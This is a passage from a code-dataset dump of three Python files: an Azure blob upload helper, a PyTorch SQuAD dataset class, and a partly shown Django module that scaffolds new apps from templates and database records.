"line_number": 178, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "233049647", "text": "import os\nfrom pathlib import Path\n\nfrom azure.storage.blob import BlockBlobService\n\n__all__ = ['AzureBlobUpload']\n\n\nclass AzureBlobUpload:\n \"\"\"\n Upload a file or a folder.\n \"\"\"\n\n def __init__(self, account_name: str, account_key: str, container_name: str):\n \"\"\"\n :param account_name:\n Azure storage account name.\n :param account_key:\n Azure storage key.\n :param container_name:\n Azure storage container name, URL will be added automatically.\n \"\"\"\n self.account_name = account_name\n self.account_key = account_key\n self.container_name = container_name\n\n self.block_blob_service = BlockBlobService(self.account_name, self.account_key)\n\n def upload_file(self, file_path: str, upload_to: str = None):\n \"\"\"\n Upload a file to a given blob path.\n\n :param upload_to:\n Give the path to upload.\n :param file_path:\n Absolute path of the file to upload.\n\n >>> from azblobexplorer import AzureBlobUpload\n >>> import os\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az.upload_file(os.path.join(here, 'file1.txt'), 'blob_folder/')\n \"\"\"\n\n path = Path(file_path)\n\n if upload_to is None:\n self.block_blob_service.create_blob_from_path(self.container_name, path.name, path)\n else:\n self.block_blob_service.create_blob_from_path(self.container_name,\n upload_to + path.name, path)\n\n def upload_files(self, files_path: list):\n \"\"\"\n Upload a list of files.\n\n :param list files_path:\n A list of files to upload.\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> path_list = [\n ... [os.path.join(here, 'file1.txt'), 'folder_1/'],\n ... [os.path.join(here, 'file2.txt'), 'folder_2/'],\n ... os.path.join(here, 'file3.txt')\n ... ]\n >>> az.upload_files(path_list)\n \"\"\"\n\n for path in files_path:\n if isinstance(path, list):\n self.upload_file(path[0], path[1])\n else:\n self.upload_file(path)\n\n def upload_folder(self, folder_path: str, upload_to: str = None):\n \"\"\"\n Upload a folder to a given blob path.\n\n :param upload_to:\n Give the path to upload. Default ``None``.\n :param folder_path:\n Absolute path of the folder to upload.\n\n **Example without \"upload_to\"**\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> az.upload_folder(os.path.join(here, 'folder_name'))\n\n **Example with \"upload_to\"**\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> az.upload_folder(os.path.join(here, 'folder_name'), upload_to=\"my/blob/location/\")\n \"\"\"\n\n path = Path(folder_path)\n\n if not path.is_dir():\n raise TypeError(\"The path should be a folder.\")\n\n root_name = path.name\n\n for _dir, _, files in os.walk(path):\n for file_name in files:\n rel_dir = os.path.relpath(_dir, path)\n rel_folder_path = os.path.join(root_name, rel_dir) + '/'\n abs_path = os.path.join(_dir, file_name)\n if upload_to is None:\n self.upload_file(abs_path, rel_folder_path)\n else:\n self.upload_file(abs_path, upload_to + rel_folder_path)\n", "sub_path": "azblobexplorer/upload.py", "file_name": "upload.py", "file_ext": "py", "file_size_in_byte": 4127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "azure.storage.blob.BlockBlobService", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 104, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "475643212", "text": "import torch\nimport numpy as np\nfrom torch.utils.data.dataset import Dataset\nclass SquadPytorchDataset(Dataset):\n def __init__(self, squad_emb):\n self.squad_emb = squad_emb\n\n def __len__(self):\n return len(self.squad_emb.datapoints)\n\n def __getitem__(self, idx):\n\n qa_id = self.squad_emb.get_id(idx)\n\n context_word_emb = self.squad_emb.get_context_word_emb(idx)\n context_char_emb = self.squad_emb.get_context_char_emb(idx)\n\n question_word_emb = self.squad_emb.get_question_word_emb(idx)\n question_char_emb = self.squad_emb.get_question_char_emb(idx)\n\n answer_start_idx = self.squad_emb.get_answer_start_idx(idx)\n answer_end_idx = self.squad_emb.get_answer_end_idx(idx)\n \n return {'context_word_emb': context_word_emb,\n 'context_char_emb': context_char_emb,\n 'question_word_emb': question_word_emb,\n 'question_char_emb': question_char_emb,\n 'answer_start_idx': answer_start_idx,\n 'answer_end_idx': answer_end_idx,\n 'qa_id': qa_id}\n", "sub_path": "experiments/experiment_7/qanet_files/embed_lib/squad_pytorch_dataset.py", "file_name": "squad_pytorch_dataset.py", "file_ext": "py", "file_size_in_byte": 1106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.utils.data.dataset.Dataset", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "323729598", "text": "import sys\nimport types\n\nfrom applicationManager.db_module_importer import DBModuleImporter\n\n__author__ = 'ozgur'\n\nfrom shutil import copyfile\nfrom django.core.management import call_command\nfrom applicationManager.models import Application, AppModel, SettingDefinition, ApplicationSettings, \\\n ApplicationView, ApplicationComponentTemplate, ApplicationUrl\nfrom applicationManager.signals.signals import application_creation_failed_signal\nfrom django.urls import path\n\nimport mako\nimport os\nimport logging\nimport datetime\nfrom mako import runtime\nfrom mako.template import Template as MakoTemplate\nfrom django.template import loader, Context, Template\n\nfrom io import StringIO\nfrom django.conf import settings\n\n\nlogger = logging.getLogger(\"wbdap.debug\")\n\nIMPORT_MODEL_TEMPLATE = \"\"\"from %(app)s.models import %(model)s\n\"\"\"\n\nIMPORT_SUB_MODEL_TEMPLATE = \"\"\"from %(app)s.%(sub_models_dir)s.generated_models import *\n\"\"\"\n\nIMPORT_DJANGO_DB = \"\"\"from django.db import models\n\"\"\"\n\nCHARFIELD_TEMPLATE = \"\"\"\n %(name)s = models.CharField(max_length=%(length)s, null=%(null)s, blank=%(blank)s)\n\"\"\"\n\nTEXTFIELD_TEMPLATE = \"\"\"\n %(name)s = models.TextField(null=%(null)s, blank=%(null)s)\n\"\"\"\n\nINTEGERFIELD_TEMPLATE = \"\"\"\n %(name)s = models.IntegerField(null=%(null)s, default=%(default)s)\n\"\"\"\n\nDECIMALFIELD_TEMPLATE = \"\"\"\n %(name)s = models.DecimalField(max_digits=%(digits)s, decimal_places=%(places)s, null=%(null)s, default=%(default)s)\n\"\"\"\n\nDATETIMEFIELD_TEMPLATE = \"\"\"\n %(name)s = models.DateTimeField(null=%(null)s, default=%(default)s)\n\"\"\"\n\nFOREIGNFIELD_TEMPLATE = \"\"\"\n %(name)s = models.ForeignKey(%(foreign)s, null=%(null)s, blank=%(null)s)\n\"\"\"\n\n\nMODEL_TEMPLATE = \"\"\"\n#begin_%(model)s\nclass %(model)s(models.Model):\n %(fields)s\n update_date = models.DateTimeField(auto_now=True)\n create_date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-id']\n#end_%(model)s\"\"\"\n\n\nclass SoftApplicationCreator:\n def __init__(self, application):\n # Application object is coming from the database records whih holds the metadata of the application\n\n self.application = application\n self.site_root = settings.SITE_ROOT\n self.sub_models = settings.SUB_MODEL_DIR\n\n try:\n self.site_root = settings.SCAFFOLD_APPS_DIR\n except:\n self.site_root = './'\n\n def create_settings(self):\n setting_defs = SettingDefinition.objects.all()\n\n for s in setting_defs:\n ApplicationSettings.objects.create(app_id=self.application.id, setting_id=s.id)\n\n def create_default_urls(self):\n # create index_page\n url = ApplicationUrl(url_pattern='/', view_method=ApplicationView.objects.get(view_name='index_page'), url_name='index-page', app_id=self.application.id)\n url.save()\n\n # create landing_page\n url = ApplicationUrl(url_pattern='/', view_method=ApplicationView.objects.get(view_name='landing_page'),\n url_name='landing-page', app_id=self.application.id)\n url.save()\n\n # create sayhello\n url = ApplicationUrl(url_pattern='/sayhello', view_method=ApplicationView.objects.get(view_name='sayhello'),\n url_name='sayhello', app_id=self.application.id)\n url.save()\n\n\n\n def create_default_views(self):\n # Create index-page view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='index_page')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n vm = ApplicationView.objects.create(view_name='index_page', view_code=temp.render(context), app_id=self.application.id)\n vm.save()\n\n\n # Create index-page view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='landing_page')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n m = ApplicationView.objects.create(view_name='landing_page', view_code=temp.render(context), app_id=self.application.id)\n vm.save()\n\n # Create sayhello view from temp\n tmp_obj = ApplicationComponentTemplate.objects.get(temp_name='sayhello')\n # tmp_obj.get_required_context_params()\n # alternative methods exists. but as we need other attributes of the componenttemplates\n # we use the above 2 lines to get temp, instead of https://docs.djangoproject.com/en/2.1/ref/templates/api/#loading-a-template\n temp = Template(tmp_obj.temp_code)\n context = Context({\"applicationName\": self.application.app_name})\n m = ApplicationView.objects.create(view_name='sayhello', view_code=temp.render(context),\n app_id=self.application.id)\n vm.save()\n\n def load_views_module(self):\n modname = self.application.app_name + '_views'\n views_in_db = ApplicationView.objects.filter(app_id=self.application.id)\n views_module = types.ModuleType(modname)\n sys.modules[modname] = views_module\n\n for v in views_in_db:\n exec(v.view_code,views_module)\n\n\n def load_urls(self):\n modname = self.application.app_name+'_urls'\n urlpatterns = []\n paths_in_db = ApplicationUrl.objects.filter(app_id=self.application.id)\n\n\n paths_module = types.ModuleType(modname)\n sys.modules[modname] = paths_module\n\n for p in paths_in_db:\n urlpatterns.append(path(p.url_pattern, p.view_method.view_name, name=p.url_name))\n\n exec(urlpatterns, paths_module)\n\n #\n #\n # import sys\n # import importlib\n # import io\n #\n # DBModuleImporter()\n # # Returns a memory-based file object and return is the same of the command open\n # f = io.StringIO(\"def hello():return 'Hello World A!'\")\n #\n # # imp.creat\n # # e_new deprecetad so use the replacement\n # m = types.ModuleType('asd_views')\n #\n #\n #\n #\n #\n # # print(m.__class__)\n # # # print(m.__file__)\n # # # print(m.__builtins__)\n # # # print(m.__name__)\n # #\n # # print(dir(m))\n # #\n # #\n # # sys.modules['aaaaaaaaa'] = m\n # # #prints none as our module has no loader here\n # # print(sys.modules['aaaaaaaaa'].__loader__)\n # #\n #\n #\n # for m in sys.modules:\n # if 'identityManager' in m:\n # print(m)\n # # print(sys.modules[m].__loader__)\n #\n # # for p in paths_in_db:\n # # path(p.url_pattern,p.view_method, p.url_name)\n #\n\n\n\n\n\n\n # Creates the application and all necessary other folders\n def create(self):\n # Check if site_root is set and it exists; otherwise raise ex\n if self.site_root and not os.path.exists('{0}'.format(self.site_root)):\n raise Exception(\n \"SCAFFOLD_APPS_DIR {0} does not exists\".format(self.site_root))\n\n # Check if app root folder exists; if not go on to create\n if not os.path.exists('{0}{1}'.format(self.site_root, self.application.app_name)):\n\n # run_all_steps creates all other application folders\n try:\n logger.info('Creating the application {0} ...'.format(self.application.app_name))\n self.run_all_steps()\n except Exception as e:\n self.rollback()\n return False\n return True\n\n else:\n logger.info(\"app folder exists\\t{0}{1}\".format(self.site_root, self.application.app_name))\n return False\n\n\n # Run all application creation steps\n def run_all_steps(self):\n # Output received from startapp django shell command\n cmd_output = StringIO()\n\n try:\n # Asagidaki kisim daha once yanlis bir yaklasimla yapilmisti.Django manage.py icin api sagliyor.Asagidaki buna gore yazildi\n # # Manage.py ile yeni uygulama uretim islemini burada yapiyorum; ne yazik ki return degeri yok, stdout'dan cikti okunuyor .\n # # Sadece exception handling ile bakabilinir.\n # os.system('python manage.py startapp {0}'.format(self.application.app_name))\n\n call_command('startapp',self.application.app_name,stdout=cmd_output)\n logger.info('=========================================================================================\\n'\n '\\t\\tNew Django application \\'' + self.application.app_name + '\\' has been created via manage.py.')\n except Exception as e:\n logger.fatal('Exception occured while creating django application: %s', str(e))\n raise Exception('./manage.py startapp failed : '+str(e))\n\n startapp = cmd_output.getvalue()\n res_flag=True\n\n # eger cmd_output ciktisi bos ise basarili bir sekilde uygulama uretilmistir.\n if startapp is \"\":\n try:\n\n logger.info(\n \"================================= STAGE 1 ==================================\\nCreating folders and files for the application using templates\\n\")\n\n self.create_urls_file()\n self.create_application_folders()\n self.create_views_file()\n self.create_signals_file()\n self.create_forms_file()\n self.create_apps_file()\n self.create_models_file()\n self.create_template_files()\n self.send_create_signal()\n\n # self.updateAppsDBWoAppConfig()\n\n # Following is not a good method\n # updateProjectUrlsFile(request)\n #\n\n logger.info('Stage-1 DONE.')\n except:\n logger.error('Stage-1 FAILED, check subtask exception')\n\n\n\n try:\n\n logger.info(\n \"================================= STAGE 2 ==================================\\n\\t\\t\")\n # self.updateProjectUrlsPy()\n # self.updateProjectSettingsPy()\n logger.info(\n \"Stage-2 DONE.\")\n\n except Exception as e:\n logger.error(\n \"Stage-2 FAILED, check subtask exception\")\n\n else:\n logger.error(\"Manage.py could not create the app\")\n logger.error(startapp)\n\n\n\n # Creates the urls.py file of the project\n def create_urls_file(self):\n app_name = self.application.app_name\n url = self.application.namedUrl\n\n # If aplication was already created run\n if os.path.exists('{0}{1}'.format(self.site_root, self.application.app_name)):\n logger.info('Creating urls.py for the new application : ' + self.application.app_name)\n try:\n t = loader.get_template('applicationManager/applicationFileTemplates/app_urls_template.txt')\n c = {'applicationName': self.application.app_name, 'url': url}\n rendered = t.render(c)\n open(self.site_root + \"/\" + app_name + \"/urls.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal('Exception occured while creating Urls.py : %s', e)\n # Send the necessary signals to rollback\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create_urls_file failed')\n\n else:\n logger.fatal(\"no such application: {0}\".format(self.application.app_name))\n\n # Creates template and static folders\n def create_application_folders(self):\n app_name = self.application.app_name\n # If aplication was already created run\n if os.path.exists('{0}{1}'.format(self.site_root, app_name)):\n logger.info('Creating extra folders for the new application')\n\n signals_dir = self.site_root + \"/\" + app_name + \"/signals/\"\n template_dir = self.site_root + \"/\" + app_name + \"/templates/\" + app_name\n static_dir = self.site_root + \"/\" + app_name + \"/static/\" + app_name\n templatetags = self.site_root + \"/\" + app_name + \"/templatetags/\"\n fixtures = self.site_root + \"/\" + app_name + \"/fixtures/\"\n management = self.site_root + \"/\" + app_name + \"/management/\"\n\n try:\n # Creating the folders\n if not os.path.exists(fixtures):\n os.makedirs(fixtures)\n open(fixtures + \"/\" + app_name + \"_fixtures_readme.txt\", \"w+\")\n\n if not os.path.exists(templatetags):\n os.makedirs(templatetags)\n\n if not os.path.exists(management):\n os.makedirs(management)\n os.makedirs(management+ \"/commands\")\n\n if not os.path.exists(template_dir):\n os.makedirs(signals_dir)\n\n if not os.path.exists(template_dir):\n os.makedirs(template_dir)\n\n if not os.path.exists(static_dir):\n os.makedirs(static_dir)\n os.makedirs(static_dir + \"/jscript\")\n open(static_dir + \"/jscript/\" + app_name + \".jscript\", \"w+\")\n os.makedirs(static_dir + \"/css\")\n open(static_dir + \"/css/\" + app_name + \".css\", \"w+\")\n copyfile(\n self.site_root + \"/applicationManager/templates/applicationManager/applicationFileTemplates/one-page-wonder.css\",\n static_dir + \"/css/\" + \"/one-page-wonder.css\")\n\n os.makedirs(static_dir + \"/images\")\n copyfile(\n self.site_root + \"/applicationManager/templates/applicationManager/applicationFileTemplates/background.jpg\",\n static_dir + \"/images/\" + \"/background.jpg\")\n\n logger.info('OK. Created necessary folders...')\n except Exception as e:\n logger.fatal(\"Exception occurred while creating Folders : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n\n raise Exception('unable to create folders: '+str(e))\n\n else:\n logger.fatal(\"no such application: {0}\".format(app_name))\n\n def create_views_file(self):\n app_name = self.application.app_name\n logger.info('Creating view files for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_views_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/views.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating view file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create views file failed: '+str(e))\n\n\n def create_signals_file(self):\n app_name = self.application.app_name\n logger.info('Creating signals files for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_signals_init_template.txt')\n\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/signals/__init__.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating signals init file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create signals init file failed: ' + str(e))\n\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_signals_handler_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/signals/handler.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating signals handler file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create signals handle file failed: ' + str(e))\n\n\n def create_forms_file(self):\n\n app_name = self.application.app_name\n logger.info('Creating forms for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_forms_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/forms.py\", \"w+\").write(rendered)\n\n except Exception as e:\n logger.fatal(\"Exception occurred while creating view file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create forms file failed: ' + str(e))\n\n\n def create_apps_file(self):\n app_name = self.application.app_name\n verbose_name = self.application.verbose_name\n url = self.application.url\n namedUrl = self.application.namedUrl\n core_app = self.application.core_app\n # owner_id = request.POST['owner_id']\n description = self.application.description\n owner_id = 1\n\n if self.application.active == 'on':\n active = \"True\"\n else:\n active = \"False\"\n\n logger.info('Creating apps.py file for the new application')\n\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/apps.py.txt')\n c = {'app_name': app_name, 'verbose_name': verbose_name, 'url': url, 'namedUrl': namedUrl,\n 'active': active,\n 'core_app': core_app, 'owner_id': owner_id,\n 'description': description}\n rendered = t.render(c)\n\n t2 = loader.get_template(\n 'applicationManager/applicationFileTemplates/init.py.txt')\n\n # c = Context({'app_name': app_name,'verbose_name':verbose_name,'url':url,'namedUrl':namedUrl,'active':active,'readmeContent':readmeContent})\n renderedInit = t2.render(c)\n\n open(self.site_root + \"/\" + app_name + \"/apps.py\", \"w+\").write(rendered)\n open(self.site_root + \"/\" + app_name + \"/__init__.py\", \"w+\").write(renderedInit)\n except Exception as e:\n logger.error(\"Exception occurred while creating apps.py file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create apps.py file failed: ' + str(e))\n\n\n def create_models_file(self):\n\n \"\"\"\n Method which creates the models.py file of the application using the models template\n @param app_name: name of the application to be created\n @return: returns 1 on success and 0 on fail\n \"\"\"\n app_name = self.application.app_name\n logger.info('Creating default models for the new application')\n try:\n t = loader.get_template(\n 'applicationManager/applicationFileTemplates/app_models_file_template.txt')\n c = {'applicationName': app_name}\n rendered = t.render(c)\n open(self.site_root + \"/\" + app_name + \"/models.py\", \"w+\").write(rendered)\n except Exception as e:\n logger.fatal(\"Exception occurred while creating models.py file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('create sample models failed: ' + str(e))\n\n\n def del_between_lines(self, fp, start, end):\n fp = fp\n for i, line in enumerate(fp):\n if i == start:\n pass\n elif i == end:\n pass\n elif i > end:\n break\n fp.close()\n\n def create_model(self, model_id):\n \"\"\"\n Creates the model if it does not exists, then fills(sync operation) the attributes. If model exists \n then again it just syncs the fields.\n \"\"\"\n model = AppModel.objects.get(id=model_id)\n app_name = self.application.app_name\n\n logger.info(\"---------- Model -------------\")\n\n with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name), 'r+') as fo:\n\n data = fo.readlines()\n fo.seek(0, 0)\n # Check if model already exists in models.py:\n # if it exists it means that it has been created manually return\n for line in data:\n if 'class {0}'.format(model) in line:\n logger.info('exists\\t{0}{1}/models.py'.format(self.site_root, self.application.app_name))\n return\n\n # So here it does not exist in models.py lets create it in sub_models folder\n\n # Open sub_models directory\n if not os.path.exists('{0}{1}/{2}'.format(self.site_root, app_name, self.sub_models)):\n os.mkdir('{0}{1}/{2}'.format(self.site_root, app_name, self.sub_models))\n\n # Rewrite the models file appending the import lines\n # open file\n # mfile = open('{0}{1}/models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'r')\n\n # fo.close()\n\n # Models.py icindeki generated_models importu yoksa ekle\n # with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'w') as fp:\n flag = True\n for line in data:\n if 'from {0}.{1}.generated_models'.format(app_name, self.sub_models) in line:\n flag = False\n break\n\n if flag:\n fo.write('from {0}.{1}.generated_models import *'.format(app_name, self.sub_models) + \"\\n\" + data)\n\n # --- Rewrite ends\n\n if not os.path.exists('{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models)):\n f=open('{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models), 'w')\n f.close()\n\n if self.model_exists(model_id, '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name,\n self.sub_models)):\n # Kaldirip terkar ekle, belki fieldlar degismistir.\n logger.info(\"Model exists\")\n # Following line cleans the file.\n filename= '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name, self.sub_models)\n # f = open('{0}{1}/{2}/generated_models.py'.format(self.site_root, self.application.app_name, self.sub_models), 'w')\n # self.remove_model_from_file(model_id,\n # '{0}{1}/{2}/generated_models.py'.format(self.site_root, self.application.app_name,\n # self.sub_models))\n self.append_model_to_file(model_id,filename)\n else:\n logger.info(\"no such model\")\n self.append_model_to_file(model_id,\n '{0}{1}/{2}/generated_models.py'.format(self.site_root, app_name,\n self.sub_models))\n\n def line_prepender(self, filehandler, line):\n filehandler.seek(0, 0)\n data = filehandler.read()\n\n print(data)\n filehandler.seek(0, 0)\n filehandler.write(line + \"\\n\"+data)\n\n\n\n def remove_model_from_file(self, model_id, filepath):\n begin_line = 0\n end_line = 0\n\n model_name = (AppModel.objects.get(id=model_id)).name\n\n logger.info(\"Removing model \"+model_name+\" from generated_models file\")\n\n mfile = open(filepath, 'r')\n lines = mfile.readlines()\n mfile.close()\n\n for ln, line in enumerate(lines):\n\n if '#begin_' + model_name.format(self.application.app_name, self.sub_models) in line:\n begin_line = ln\n\n if '#end_' + model_name.format(self.application.app_name, self.sub_models) in line:\n end_line = ln\n\n wfile = open(filepath, 'w')\n #\n # for no, line in enumerate(lines):\n # if begin_line <= no <= end_line:\n # pass\n # else:\n # wfile.write(line)\n\n def str_exists(self, file, target_line):\n f = open(file, 'r')\n lines = f.readlines()\n f.close()\n\n for line in lines:\n if target_line in line:\n return True\n return False\n\n def append_model_to_file(self, model_id, file):\n\n # REFILL EVERYTHING\n\n # Flag for inclusion of sub module directory\n inc_smdir = True\n inc_import_template = True\n\n # Prepare fields\n self.imports = []\n fields = []\n\n model = AppModel.objects.get(id=model_id)\n mfields = model.fields.all()\n print(mfields)\n for field in mfields:\n new_field = self.get_field(field)\n print(new_field)\n if new_field:\n fields.append(new_field)\n\n print(fields)\n\n with open(file, 'w') as fp:\n if not self.str_exists(file, \"from \" + model.app.app_name + \".models import *\"):\n fp.write(IMPORT_MODEL_TEMPLATE % {\"app\": self.application.app_name, \"model\": \"*\"})\n\n if not self.str_exists(file, \"from django.db import models\"):\n fp.write(IMPORT_DJANGO_DB)\n\n # fp.write(''.join([import_line for import_line in self.imports]))\n fp.write(MODEL_TEMPLATE % {\"model\": model, \"fields\": ''.join(field for field in fields)})\n\n if inc_smdir:\n with open('{0}{1}/models.py'.format(self.site_root, self.application.app_name), 'a') as fp:\n fp.write(IMPORT_SUB_MODEL_TEMPLATE % {\"app\": self.application.app_name, \"sub_models_dir\": self.sub_models})\n\n\n\n def create_template_files(self):\n\n \"\"\"\n This method creates the project compliant template files to be used with views.\n @param app_name: Application name to be created\n @param appUrl: The URL of the applciation\n @return: True or False depending on the success\n \"\"\"\n app_name = self.application.app_name\n appUrl = self.application.url\n\n logger.info('Creating template files for the new application')\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_landing_html_template.txt')\n # t = loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/landing.html\", \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating index2.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of index2.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_app-template-file_template.txt')\n # t = loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_app_template.html\",\n \"w+\").write(buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating app_template.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of app template file failed: ' + str(e))\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_navbar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_navbar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of navbar.html failed: ' + str(e))\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_navbar_template2.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_navbar2.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of navbar2.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application_dashboard_left_sidebar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_left_sidebar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of left_sidebar.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/application-wide_navbar_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(\n self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/\" + app_name + \"_landing_page_navbar.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating landing page navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of landing_page_navbar failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_new_page_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=appUrl)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + 